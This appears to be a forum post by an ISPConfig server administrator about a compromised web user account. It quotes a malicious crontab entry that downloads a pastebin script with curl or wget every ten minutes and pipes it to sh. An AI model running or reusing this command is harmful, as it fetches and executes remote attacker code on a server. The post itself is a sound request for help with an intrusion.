ISPConfig 3.1.13, on Debian GNU/Linux 9.8 Stretch. Web server root got email: Code: Date: Wed, 3 Apr 2019 15:30:03 +0300 (EEST) From: [email protected] To: [email protected] Subject: *** SECURITY information for web.mydomain.tld *** web.mydomain.tld : Apr 3 15:30:02 : webXYZ : user NOT in sudoers ; TTY=unknown ; PWD=/var/www/clients/clientAB/webXYZ ; USER=root ; +COMMAND=/usr/bin/crontab - There is crontab file for that user in /var/spool/cron/crontabs Code: [email protected]:~# ls -lh /var/spool/cron/crontabs/ yhteensä 12K -rw------- 1 root crontab 885 maali 17 17:13 root -rw------- 1 webXYZ crontab 285 huhti 4 10:39 webXYZ [email protected]:~# The file contains this line: Code: /10 * * * * (curl -fsSL https://pastebin.com/raw/v5XC0BJh||wget -q -O- https://pastebin.com/raw/v5XC0BJh)|sh Which to my interpetation downloaws with curl and if it is not available with wget a similar line with different url but still from pastebin, which in turn downloads and executes code from https://pastebin.com/xmxHzu5P That is a shell script, which first chmods /tmp and then kills processes and what not. Since this is not executed with root permissions, most of those commands shoud fail. That webXYZ user has in ISPConfig Max. Allowed Cronjob types the value URL Cron. Is it some exploit that user can create crontab files?